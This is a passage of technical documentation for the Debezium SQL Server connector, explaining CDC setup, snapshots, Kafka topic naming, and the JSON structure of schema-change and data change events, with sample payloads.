dedicated Kafka topic.\nApplications and services can then consume data change event records from that topic.\n\n\n\/\/ Type: concept\n\/\/ Title: Overview of {prodname} SQL Server connector\n\/\/ ModuleID: overview-of-debezium-sql-server-connector\n[[sqlserver-overview]]\n== Overview\n\nThe {prodname} SQL Server connector is based on the https:\/\/docs.microsoft.com\/en-us\/sql\/relational-databases\/track-changes\/about-change-data-capture-sql-server?view=sql-server-2017[change data capture]\nfeature that is available in https:\/\/blogs.msdn.microsoft.com\/sqlreleaseservices\/sql-server-2016-service-pack-1-sp1-released\/[SQL Server 2016 Service Pack 1 (SP1) and later] Standard edition or Enterprise edition.\nThe SQL Server capture process monitors designated databases and tables, and stores the changes into specifically created _change tables_ that have stored procedure facades.\n\nTo enable the {prodname} SQL Server connector to capture change event records for database operations,\nyou must first enable change data capture on the SQL Server database.\nCDC must be enabled on both the database and on each table that you want to capture.\nAfter you set up CDC on the source database, the connector can capture row-level `INSERT`, `UPDATE`, and `DELETE` operations\nthat occur in the database.\nThe connector writes event records for each source table to a Kafka topic especially dedicated to that table.\nOne topic exists for each captured table.\nClient applications read the Kafka topics for the database tables that they follow, and can respond to the row-level events they consume from those topics.\n\nThe first time that the connector connects to a SQL Server database or cluster, it takes a consistent snapshot of the schemas for all tables for which it is configured to capture changes,\nand streams this state to Kafka.\nAfter the snapshot is complete, the connector continuously captures subsequent row-level changes that occur.\nBy first establishing a consistent view of all of the data, the connector can continue reading without having lost any of the changes that were made while the snapshot was taking place.\n
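\nAs noted above, CDC must be enabled on both the database and on every table to be captured before the connector can stream changes. For orientation, enabling CDC typically involves the standard SQL Server stored procedures shown in the following sketch (the `testDB` database and `dbo.customers` table are illustrative only, and the capture job requires a running SQL Server Agent):\n\n[source,sql]\n----\nUSE testDB;\nGO\n-- Enable CDC at the database level\nEXEC sys.sp_cdc_enable_db;\nGO\n-- Create a capture instance (and change table) for one source table\nEXEC sys.sp_cdc_enable_table\n    @source_schema = N'dbo',\n    @source_name = N'customers',\n    @role_name = NULL,\n    @supports_net_changes = 0;\nGO\n----\n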
\nThe {prodname} SQL Server connector is tolerant of failures.\nAs the connector reads changes and produces events, it periodically records the position of events in the database log (_LSN \/ Log Sequence Number_).\nIf the connector stops for any reason (including communication failures, network problems, or crashes), after a restart the connector resumes reading the SQL Server _CDC_ tables from the last point that it read.\n\nNOTE: Offsets are committed periodically.\nThey are not committed at the time that a change event occurs.\nAs a result, following an outage, duplicate events might be generated.\n\nFault tolerance also applies to snapshots.\nThat is, if the connector stops during a snapshot, the connector begins a new snapshot when it restarts.\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-sql-server-connectors-work\n\/\/ Title: How {prodname} SQL Server connectors work\n[[how-the-sqlserver-connector-works]]\n== How the SQL Server connector works\n\nTo optimally configure and run a {prodname} SQL Server connector, it is helpful to understand how the connector performs snapshots, streams change events, determines Kafka topic names, and uses metadata.\n\nifdef::product[]\n\nFor details about how the connector works, see the following sections:\n\n* xref:how-debezium-sql-server-connectors-perform-database-snapshots[]\n* xref:how-the-debezium-sql-server-connector-reads-change-data-tables[]\n* xref:default-names-of-kafka-topics-that-receive-debezium-sql-server-change-event-records[]\n* xref:how-the-debezium-sql-server-connector-uses-the-schema-change-topic[]\n* xref:descriptions-of-debezium-sql-server-connector-data-change-events[]\n* xref:debezium-sql-server-connector-generated-events-that-represent-transaction-boundaries[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ Title: How {prodname} SQL Server connectors perform database snapshots\n\/\/ ModuleID: how-debezium-sql-server-connectors-perform-database-snapshots\n[[sqlserver-snapshots]]\n=== Snapshots\n\nSQL Server CDC is not designed to store a complete history of database changes.\nFor the {prodname} SQL Server connector to establish a baseline for the current state of the database,\nit uses a process called _snapshotting_.\n\nYou can configure how the connector creates snapshots.\nBy default, the connector's snapshot mode is set to `initial`.\nBased on this `initial` snapshot mode, the first time that the connector starts, it performs an initial _consistent snapshot_ of the database.\nThis initial snapshot captures the structure and data for any tables that match the criteria defined by the `include` and `exclude` properties that are configured for the connector (for example, `table.include.list`, `column.include.list`, `table.exclude.list`, and so forth).\n\nWhen the connector creates a snapshot, it completes the following tasks:\n\n1. Determines the tables to be captured.\n2. Obtains a lock on the SQL Server tables for which CDC is enabled to prevent structural changes from occurring during creation of the snapshot.\nThe level of the lock is determined by the `snapshot.isolation.mode` configuration option.\n3. 
Reads the maximum log sequence number (LSN) position in the server's transaction log.\n4. Captures the structure of all relevant tables.\n5. Releases the locks obtained in Step 2, if necessary. In most cases, locks are held for only a short period of time.\n6. Scans the SQL Server source tables and schemas to be captured based on the LSN position that was read in Step 3, generates a `READ` event for each row in the table, and writes the events to the Kafka topic for the table.\n7. Records the successful completion of the snapshot in the connector offsets.\n\nThe resulting initial snapshot captures the current state of each row in the tables that are enabled for CDC.\nFrom this baseline state, the connector captures subsequent changes as they occur.\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-sqlserver-ad-hoc-snapshots\n[id=\"sqlserver-ad-hoc-snapshots\"]\n==== Ad hoc snapshots\ninclude::{partialsdir}\/modules\/all-connectors\/con-connector-ad-hoc-snapshots.adoc[leveloffset=+3]\n\n\/\/ Type: concept\n[id=\"sqlserver-incremental-snapshots\"]\n==== Incremental snapshots\ninclude::{partialsdir}\/modules\/all-connectors\/con-connector-incremental-snapshot.adoc[leveloffset=+3]\n\n[WARNING]\n====\nThe {prodname} connector for SQL Server does not support schema changes while an incremental snapshot is running.\n====\n\n\/\/ Type: concept\n\/\/ ModuleID: how-the-debezium-sql-server-connector-reads-change-data-tables\n\/\/ Title: How {prodname} SQL Server connectors read change data tables\n=== Reading the change data tables\n\nWhen the connector first starts, it takes a structural snapshot of the captured tables\nand persists this information to its internal database schema history topic.\nThe connector then identifies a change table for each source table, and completes the following steps.\n\n1. For each change table, the connector reads all of the changes that were created between the last stored maximum LSN and the current maximum LSN.\n2. The connector sorts the changes that it reads in ascending order, based on the values of their commit LSN and change LSN.\nThis sorting order ensures that the changes are replayed by {prodname} in the same order in which they occurred in the database.\n3. The connector passes the commit and change LSNs as offsets to Kafka Connect.\n4. The connector stores the maximum LSN and restarts the process from Step 1.\n\nAfter a restart, the connector resumes processing from the last offset (commit and change LSNs) that it read.\n\nThe connector is able to detect whether CDC is enabled or disabled for included source tables and adjust its behavior.\n\n\/\/ Type: concept\n\/\/ ModuleID: no-maximum-lsn-recorded-in-the-database\n\/\/ Title: No maximum LSN recorded in the database\n=== No maximum LSN recorded in the database\n\nThere may be situations when no maximum LSN is recorded in the database because:\n\n1. SQL Server Agent is not running\n2. No changes are recorded in the change table yet\n3. Database has low activity and the CDC cleanup job periodically clears entries from the CDC tables\n\nOf these possibilities, only the first case is a real problem, because a running SQL Server Agent is a prerequisite; the second and third cases are normal.\n\nTo mitigate this issue and to differentiate between the first case 
and the others, the connector checks the status of the SQL Server Agent through the following query: `\"SELECT CASE WHEN dss.[status]=4 THEN 1 ELSE 0 END AS isRunning FROM [#db].sys.dm_server_services dss WHERE dss.[servicename] LIKE N'SQL Server Agent (%';\"`.\nIf the SQL Server Agent is not running, an ERROR is written to the log: \"No maximum LSN recorded in the database; SQL Server Agent is not running\".\n\n[IMPORTANT]\n====\nThe SQL Server Agent running status query requires `VIEW SERVER STATE` server permission.\nIf you don't want to grant this permission to the configured user, you can choose to configure your own query through the `database.sqlserver.agent.status.query` property.\nYou can define a function that returns true or 1 if the SQL Server Agent is running (false or 0 otherwise) and safely use high-level permissions without granting them, as explained\nhere: link:https:\/\/dba.stackexchange.com\/questions\/62230\/what-minimum-permissions-do-i-need-to-provide-to-a-user-so-that-it-can-check-the\/103275#103275[What minimum permissions do I need to provide to a user so that it can check the status of SQL Server Agent Service?]\nor here: link:https:\/\/sqlquantumleap.com\/2018\/02\/15\/safely-and-easily-use-high-level-permissions-without-granting-them-to-anyone-server-level\/[Safely and Easily Use High-Level Permissions Without Granting Them to Anyone: Server-level].\nThe configuration of the query property would look like: `database.sqlserver.agent.status.query=SELECT [#db].func_is_sql_server_agent_running()` - you need to use `[#db]` as a placeholder for the database name.\n====\n\n\/\/ Type: concept\n\/\/ ModuleID: limitations-sql-server-connector\n\/\/ Title: Limitations of {prodname} SQL Server connector\n=== Limitations\n\nSQL Server specifically requires the base object to be a table in order to create a change capture instance.\nAs a consequence, capturing changes from indexed views (also known as 
materialized views) is not supported by SQL Server, and hence is not supported by the {prodname} SQL Server connector.\n\n\/\/ Type: concept\n\/\/ ModuleID: default-names-of-kafka-topics-that-receive-debezium-sql-server-change-event-records\n\/\/ Title: Default names of Kafka topics that receive {prodname} SQL Server change event records\n[[sqlserver-topic-names]]\n=== Topic names\n\nBy default, the SQL Server connector writes events for all `INSERT`, `UPDATE`, and `DELETE` operations that occur in a table to a single Apache Kafka topic that is specific to that table.\nThe connector uses the following convention to name change event topics:\n`_<topicPrefix>_._<databaseName>_._<schemaName>_._<tableName>_`\n\nThe following list provides definitions for the components of the default name:\n\n_topicPrefix_:: The logical name of the server, as specified by the xref:sqlserver-property-topic-prefix[`topic.prefix`] configuration property.\n_databaseName_:: The name of the database in which the change event occurred.\n_schemaName_:: The name of the database schema in which the change event occurred.\n_tableName_:: The name of the database table in which the change event occurred.\n\nFor example, if `fulfillment` is the server name, `testDB` is the database name, and `dbo` is the schema name, and the database contains tables with the names `products`, `products_on_hand`, `customers`, and `orders`,\nthe connector would stream change event records to the following Kafka topics:\n\n* `fulfillment.testDB.dbo.products`\n* `fulfillment.testDB.dbo.products_on_hand`\n* `fulfillment.testDB.dbo.customers`\n* `fulfillment.testDB.dbo.orders`\n\nThe connector applies similar naming conventions to label its internal database schema history topics, xref:about-the-debezium-sqlserver-connector-schema-change-topic[schema change topics], and xref:sqlserver-transaction-metadata[transaction metadata topics].\n\nIf the default topic names do not meet your requirements, you can configure custom topic names.\nTo configure custom topic names, you specify regular expressions in the logical topic routing SMT.\nFor more information about using the logical topic routing SMT to customize topic naming, see xref:{link-topic-routing}#topic-routing[Topic routing].\n\n\n\/\/ Type: concept\n\/\/ ModuleID: how-the-debezium-sql-server-connector-uses-the-schema-change-topic\n\/\/ Title: How the {prodname} SQL Server connector uses the schema change topic\n[[about-the-debezium-sqlserver-connector-schema-change-topic]]\n=== Schema change topic\n\nFor each table for which CDC is enabled, the {prodname} SQL Server connector stores a history of the schema change events that are applied to captured tables in the database.\nThe connector writes schema change events to a Kafka topic named `_<topicPrefix>_`, where `_topicPrefix_` is the logical server name that is specified in the xref:sqlserver-property-topic-prefix[`topic.prefix`] configuration property.\n\nMessages that the connector sends to the schema change topic contain a payload, and, optionally, also contain the schema of the change event message.\nThe payload of a schema change event message includes the following elements:\n\n`databaseName`:: The name of the database to which the statements are applied.\nThe value of `databaseName` serves as the message key.\n`tableChanges`:: A structured representation of the entire table schema after the schema change.\nThe `tableChanges` field contains an array that includes entries for each column of the table.\nBecause the structured representation presents data in JSON or Avro format, consumers can easily read messages without first processing them through a DDL parser.\n\n[IMPORTANT]\n====\nWhen 
the connector is configured to capture a table, it stores the history of the table's schema changes not only in the schema change topic, but also in an internal database schema history topic.\nThe internal database schema history topic is for connector use only and it is not intended for direct use by consuming applications.\nEnsure that applications that require notifications about schema changes consume that information only from the schema change topic.\n====\n\n[WARNING]\n====\nThe format of the messages that a connector emits to its schema change topic is in an incubating state and can change without notice.\n====\n\n{prodname} emits a message to the schema change topic when the following events occur:\n\n* You enable CDC for a table.\n* You disable CDC for a table.\n* You alter the structure of a table for which CDC is enabled by following the xref:{link-sqlserver-connector}#sqlserver-schema-evolution[schema evolution procedure].\n\n.Example: Message emitted to the SQL Server connector schema change topic\nThe following example shows a message in the schema change topic.\nThe message contains a logical representation of the table schema.\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": {\n ...\n },\n \"payload\": {\n \"source\": {\n \"version\": \"{debezium-version}\",\n \"connector\": \"sqlserver\",\n \"name\": \"server1\",\n \"ts_ms\": 0,\n \"snapshot\": \"true\",\n \"db\": \"testDB\",\n \"schema\": \"dbo\",\n \"table\": \"customers\",\n \"change_lsn\": null,\n \"commit_lsn\": \"00000025:00000d98:00a2\",\n \"event_serial_no\": null\n },\n \"ts_ms\": 1588252618953, \/\/ <1>\n \"databaseName\": \"testDB\", \/\/ <2>\n \"schemaName\": \"dbo\",\n \"ddl\": null, \/\/ <3>\n \"tableChanges\": [ \/\/ <4>\n {\n \"type\": \"CREATE\", \/\/ <5>\n \"id\": \"\\\"testDB\\\".\\\"dbo\\\".\\\"customers\\\"\", \/\/ <6>\n \"table\": { \/\/ <7>\n \"defaultCharsetName\": null,\n \"primaryKeyColumnNames\": [ \/\/ <8>\n \"id\"\n ],\n \"columns\": [ \/\/ <9>\n {\n \"name\": \"id\",\n \"jdbcType\": 4,\n \"nativeType\": null,\n \"typeName\": \"int identity\",\n \"typeExpression\": \"int identity\",\n \"charsetName\": null,\n \"length\": 10,\n \"scale\": 0,\n \"position\": 1,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"first_name\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 2,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"last_name\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 3,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"email\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 4,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n }\n ],\n \"attributes\": [ \/\/ <10>\n {\n \"customAttribute\": \"attributeValue\"\n }\n ]\n }\n }\n ]\n }\n}\n----\n\n.Descriptions of fields in messages emitted to the schema change topic\n[cols=\"1,4,5\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`ts_ms`\n|Optional field that displays the time at which the connector processed the 
event. The time is based on the system clock in the JVM running the Kafka Connect task.

In the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.

|2
|`databaseName` +
`schemaName`
|Identifies the database and the schema that contain the change.

|3
|`ddl`
|Always `null` for the SQL Server connector.
For other connectors, this field contains the DDL responsible for the schema change.
This DDL is not available to SQL Server connectors.

|4
|`tableChanges`
|An array of one or more items that contain the schema changes generated by a DDL command.

|5
|`type`
a|Describes the kind of change. The value is one of the following:

* `CREATE` - table created
* `ALTER` - table modified
* `DROP` - table deleted

|6
|`id`
|Full identifier of the table that was created, altered, or dropped.

|7
|`table`
|Represents table metadata after the applied change.

|8
|`primaryKeyColumnNames`
|List of columns that compose the table's primary key.

|9
|`columns`
|Metadata for each column in the changed table.

|10
|`attributes`
|Custom attribute metadata for each table change.

|===

In messages that the connector sends to the schema change topic, the key is the name of the database that contains the schema change.
In the following example, the `payload` field contains the key:

[source,json,indent=0,subs="+attributes"]
----
{
 "schema": {
 "type": "struct",
 "fields": [
 {
 "type": "string",
 "optional": false,
 "field": "databaseName"
 }
 ],
 "optional": false,
 "name": "io.debezium.connector.sqlserver.SchemaChangeKey"
 },
 "payload": {
 "databaseName": "testDB"
 }
}
----

// Type: assembly
// ModuleID: descriptions-of-debezium-sql-server-connector-data-change-events
// Title: Descriptions of {prodname} SQL Server connector data change events
=== Data change events

The {prodname} SQL Server connector generates a data change event for each row-level `INSERT`, `UPDATE`, and `DELETE` operation. Each event contains a key and a value. The structure of the key and the value depends on the table that was changed.

{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained.

The following skeleton JSON shows the four basic parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce them. 
If you use the JSON converter and you configure it to produce all four basic change event parts, change events have this structure:

[source,json,indent=0]
----
{
 "schema": { // <1>
 ...
 },
 "payload": { // <2>
 ...
 },
 "schema": { // <3>
 ...
 },
 "payload": { // <4>
 ...
 }
}
----

.Overview of change event basic content
[cols="1,2,7",options="header"]
|===
|Item |Field name |Description

|1
|`schema`
|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the primary key, or the unique key if the table does not have a primary key, for the table that was changed. +
 +
It is possible to override the table's primary key by setting the xref:{link-sqlserver-connector}#sqlserver-property-message-key-columns[`message.key.columns` connector configuration property]. In this case, the first schema field describes the structure of the key identified by that property.

|2
|`payload`
|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the row that was changed.

|3
|`schema`
|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the row that was changed. Typically, this schema contains nested schemas.

|4
|`payload`
|The second `payload` field is part of the event value. It has the structure described by the previous `schema` field and it contains the actual data for the row that was changed.

|===

By default, the connector streams change event records to topics with names that are the same as the event's originating table. See xref:{link-sqlserver-connector}#sqlserver-topic-names[topic names].

[WARNING]
====
The SQL Server connector ensures that all Kafka Connect schema names adhere to the link:http://avro.apache.org/docs/current/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or \_. Each remaining character in the logical server name and each character in the database and table names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or \_. If there is an invalid character, it is replaced with an underscore character.

This can lead to unexpected conflicts if the logical server name, a database name, or a table name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.
====

ifdef::product[]

For details about change events, see the following topics:

* xref:about-keys-in-debezium-sql-server-change-events[]
* xref:about-values-in-debezium-sql-server-change-events[]

endif::product[]

// Type: concept
// ModuleID: about-keys-in-debezium-sql-server-change-events
// Title: About keys in {prodname} SQL Server change events
[[sqlserver-change-event-keys]]
==== Change event keys

A change event's key contains the schema for the changed table's key and the changed row's actual key. 
Both the schema and its corresponding payload contain a field for each column in the changed table's primary key (or unique key constraint) at the time the connector created the event.

Consider the following `customers` table, which is followed by an example of a change event key for this table.

.Example table
[source,sql,indent=0]
----
CREATE TABLE customers (
 id INTEGER IDENTITY(1001,1) NOT NULL PRIMARY KEY,
 first_name VARCHAR(255) NOT NULL,
 last_name VARCHAR(255) NOT NULL,
 email VARCHAR(255) NOT NULL UNIQUE
);
----

.Example change event key
Every change event that captures a change to the `customers` table has the same event key schema. For as long as the `customers` table has the previous definition, every change event that captures a change to the `customers` table has the following key structure, which in JSON looks like this:

[source,json,indent=0]
----
{
 "schema": { // <1>
 "type": "struct",
 "fields": [ // <2>
 {
 "type": "int32",
 "optional": false,
 "field": "id"
 }
 ],
 "optional": false, // <3>
 "name": "server1.testDB.dbo.customers.Key" // <4>
 },
 "payload": { // <5>
 "id": 1004
 }
}
----

.Description of change event key
[cols="1,2,7",options="header"]
|===
|Item |Field name |Description

|1
|`schema`
|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion.

|2
|`fields`
|Specifies each field that is expected in the `payload`, including each field's name, type, and whether it is required. In this example, there is one required field named `id` of type `int32`.

|3
|`optional`
|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.

|4
|`server1.testDB.dbo.customers.Key`
a|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._database-name_._database-schema-name_._table-name_.`Key`. In this example: +

* `server1` is the name of the connector that generated this event. +
* `testDB` is the database that contains the table that was changed. +
* `dbo` is the database schema for the table that was changed. +
* `customers` is the table that was updated.

|5
|`payload`
|Contains the key for the row for which this change event was generated. In this example, the key contains a single `id` field whose value is `1004`.

|===

ifdef::community[]
[NOTE]
====
Although the `column.exclude.list` and `column.include.list` connector configuration properties allow you to capture only a subset of table columns, all columns in a primary or unique key are always included in the event's key.
====

[WARNING]
====
If the table does not have a primary or unique key, then the change event's key is null. This makes sense since the rows in a table without a primary or unique key constraint cannot be uniquely identified.
====
endif::community[]


// Type: concept
// ModuleID: about-values-in-debezium-sql-server-change-events
// Title: About values in {prodname} SQL Server change events
[[sqlserver-change-event-values]]
==== Change event values

The value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. 
The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update, or delete data all have a value payload with an envelope structure.

Consider the same sample table that was used to show an example of a change event key:

[source,sql,indent=0]
----
CREATE TABLE customers (
 id INTEGER IDENTITY(1001,1) NOT NULL PRIMARY KEY,
 first_name VARCHAR(255) NOT NULL,
 last_name VARCHAR(255) NOT NULL,
 email VARCHAR(255) NOT NULL UNIQUE
);
----

The value portion of a change event for a change to this table is described for each event type.

ifdef::product[]

* <<sqlserver-create-events,_create_ events>>
* <<sqlserver-update-events,_update_ events>>
* <<sqlserver-delete-events,_delete_ events>>

endif::product[]

[[sqlserver-create-events]]
===== _create_ events

The following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` table:

[source,json,indent=0,subs="+attributes"]
----
{
 "schema": { // <1>
 "type": "struct",
 "fields": [
 {
 "type": "struct",
 "fields": [
 {
 "type": "int32",
 "optional": false,
 "field": "id"
 },
 {
 "type": "string",
 "optional": false,
 "field": "first_name"
 },
 {
 "type": "string",
 "optional": false,
 "field": "last_name"
 },
 {
 "type": "string",
 "optional": false,
 "field": "email"
 }
 ],
 "optional": true,
 "name": "server1.testDB.dbo.customers.Value", // <2>
 "field": "before"
 },
 {
 "type": "struct",
 "fields": [
 {
 "type": "int32",
 "optional": false,
 "field": "id"
 },
 {
 "type": "string",
 "optional": false,
 "field": "first_name"
 },
 {
 "type": "string",
 "optional": false,
 "field": "last_name"
 },
 {
 "type": "string",
 "optional": false,
 "field": "email"
 }
 ],
 "optional": true,
 "name": "server1.testDB.dbo.customers.Value",
 "field": "after"
 },
 {
 "type": "struct",
 "fields": [
 {
 "type": "string",
 "optional": false,
 "field": "version"
 },
 {
 "type": "string",
 "optional": false,
 "field": "connector"
 },
 {
 "type": "string",
 "optional": false,
 "field": "name"
 },
 {
 "type": "int64",
 "optional": false,
 "field": "ts_ms"
 },
 {
 "type": "boolean",
 "optional": true,
 "default": false,
 "field": "snapshot"
 },
 {
 "type": "string",
 "optional": false,
 "field": "db"
 },
 {
 "type": "string",
 "optional": false,
 "field": "schema"
 },
 {
 "type": "string",
 "optional": false,
 "field": "table"
 },
 {
 "type": "string",
 "optional": true,
 "field": "change_lsn"
 },
 {
 "type": "string",
 "optional": true,
 "field": "commit_lsn"
 },
 {
 "type": "int64",
 "optional": true,
 "field": "event_serial_no"
 }
 ],
 "optional": false,
 "name": "io.debezium.connector.sqlserver.Source", // <3>
 "field": "source"
 },
 {
 "type": "string",
 "optional": false,
 "field": "op"
 },
 {
 "type": "int64",
 "optional": true,
 "field": "ts_ms"
 }
 ],
 "optional": false,
 "name": "server1.testDB.dbo.customers.Envelope" // <4>
 },
 "payload": { // <5>
 "before": null, // <6>
 "after": { // <7>
 "id": 
1005,
 "first_name": "john",
 "last_name": "doe",
 "email": "john.doe@example.org"
 },
 "source": { // <8>
 "version": "{debezium-version}",
 "connector": "sqlserver",
 "name": "server1",
 "ts_ms": 1559729468470,
 "snapshot": false,
 "db": "testDB",
 "schema": "dbo",
 "table": "customers",
 "change_lsn": "00000027:00000758:0003",
 "commit_lsn": "00000027:00000758:0005",
 "event_serial_no": 1
 },
 "op": "c", // <9>
 "ts_ms": 1559729471739 // <10>
 }
}
----


.Descriptions of _create_ event value fields
[cols="1,2,7",options="header"]
|===
|Item |Field name |Description

|1
|`schema`
|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular table.

|2
|`name`
a|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. +
 +
`server1.testDB.dbo.customers.Value` is the schema for the payload's `before` and `after` fields. This schema is specific to the `customers` table. +
 +
 Names of schemas for `before` and `after` fields are of the form `_logicalName_._databaseName_._schemaName_._tableName_.Value`, which ensures that the schema name is unique in the database.
 This means that when using the xref:{link-avro-serialization}#avro-serialization[Avro converter], the resulting Avro schema for each table in each logical source has its own evolution and history.

|3
|`name`
a|`io.debezium.connector.sqlserver.Source` is the schema for the payload's `source` field. This schema is specific to the SQL Server connector. The connector uses it for all events that it generates.

|4
|`name`
a|`server1.testDB.dbo.customers.Envelope` is the schema for the overall structure of the payload, where `server1` is the connector name, `testDB` is the database name, `dbo` is the database schema name, and `customers` is the table.

|5
|`payload`
|The value's actual data. This is the information that the change event is providing. +
 +
It may appear that the JSON representations of the events are much larger than the rows they describe. This is because the JSON representation must include the schema and the payload portions of the message.
However, by using the xref:{link-avro-serialization}#avro-serialization[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.

|6
|`before`
|An optional field that specifies the state of the row before the event occurred. When the `op` field is `c` for create, as it is in this example, the `before` field is `null` since this change event is for new content.

|7
|`after`
|An optional field that specifies the state of the row after the event occurred. In this example, the `after` field contains the values of the new row's `id`, `first_name`, `last_name`, and `email` columns.

|8
|`source`
a|Mandatory field that describes the source metadata for the event. This field contains information that you can use to compare this event with other events, with regard to the origin of the events, the order in which the events occurred, and whether events were part of the same transaction. 
The source metadata includes:

* {prodname} version
* Connector type and name
* Database and schema names
* Timestamp for when the change was made in the database
* If the event was part of a snapshot
* Name of the table that contains the new row
* Server log offsets

|9
|`op`
a|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a row. Valid values are:

* `c` = create
* `u` = update
* `d` = delete
* `r` = read (applies only to snapshots)

|10
|`ts_ms`
a| Optional field that displays the time at which the connector processed the event.
In the event message envelope, the time is based on the system clock in the JVM running the Kafka Connect task. +
 +
In the `source` object, `ts_ms` indicates the time when a change was committed in the database.
By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.

|===

[[sqlserver-update-events]]
===== _update_ events

The value of a change event for an update in the sample `customers` table has the same schema as a _create_ event for that table. Likewise, the event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. Here is an example of a change event value in an event that the connector generates for an update in the `customers` table:

[source,json,indent=0,subs="+attributes"]
----
{
 "schema": { ... },
 "payload": {
 "before": { // <1>
 "id": 1005,
 "first_name": "john",
 "last_name": "doe",
 "email": "john.doe@example.org"
 },
 "after": { // <2>
 "id": 1005,
 "first_name": "john",
 "last_name": "doe",
 "email": "noreply@example.org"
 },
 "source": { // <3>
 "version": "{debezium-version}",
 "connector": "sqlserver",
 "name": "server1",
 "ts_ms": 1559729995937,
 "snapshot": false,
 "db": "testDB",
 "schema": "dbo",
 "table": "customers",
 "change_lsn": "00000027:00000ac0:0002",
 "commit_lsn": "00000027:00000ac0:0007",
 "event_serial_no": 2
 },
 "op": "u", // <4>
 "ts_ms": 1559729998706 // <5>
 }
}
----


.Descriptions of _update_ event value fields
[cols="1,2,7",options="header"]
|===
|Item |Field name |Description

|1
|`before`
|An optional field that specifies the state of the row before the event occurred. In an _update_ event value, the `before` field contains a field for each table column and the value that was in that column before the database commit. In this example, the `email` value is `john.doe@example.org`.

|2
|`after`
| An optional field that specifies the state of the row after the event occurred. You can compare the `before` and `after` structures to determine what the update to this row was. In the example, the `email` value is now `noreply@example.org`.

|3
|`source`
a|Mandatory field that describes the source metadata for the event. The `source` field structure has the same fields as in a _create_ event, but some values are different, for example, the sample _update_ event has a different offset. 
The source metadata includes:

* {prodname} version
* Connector type and name
* Database and schema names
* Timestamp for when the change was made in the database
* If the event was part of a snapshot
* Name of the table that contains the new row
* Server log offsets

The `event_serial_no` field differentiates events that have the same commit and change LSN. Typical situations in which this field has a value other than `1`:

* _update_ events have the value set to `2` because the update generates two events in the CDC change table of SQL Server (link:https://docs.microsoft.com/en-us/sql/relational-databases/system-tables/cdc-capture-instance-ct-transact-sql?view=sql-server-2017[see the source documentation for details]). The first event contains the old values and the second contains the new values. The connector uses values in the first event to create the second event. The connector drops the first event.

* When a primary key is updated, SQL Server emits two events: a _delete_ event for the removal of the record with the old primary key value, and a _create_ event for the addition of the record with the new primary key.
Both operations share the same commit and change LSN and their event numbers are `1` and `2`, respectively.

|4
|`op`
a|Mandatory string that describes the type of operation. In an _update_ event value, the `op` field value is `u`, signifying that this row changed because of an update.

|5
|`ts_ms`
a| Optional field that displays the time at which the connector processed the event.
In the event message envelope, the time is based on the system clock in the JVM running the Kafka Connect task. +
 +
In the `source` object, `ts_ms` indicates the time when the change was committed to the database.
By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.

|===

[NOTE]
====
Updating the columns for a row's primary/unique key changes the value of the row's key. When a key changes, {prodname} outputs _three_ events: a _delete_ event and a xref:{link-sqlserver-connector}#sqlserver-tombstone-events[tombstone event] with the old key for the row, followed by a _create_ event with the new key for the row.
====

[[sqlserver-delete-events]]
===== _delete_ events

The value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same table. The `payload` portion in a _delete_ event for the sample `customers` table looks like this:

[source,json,indent=0,subs="+attributes"]
----
{
 "schema": { ... },
 "payload": {
 "before": { // <1>
 "id": 1005,
 "first_name": "john",
 "last_name": "doe",
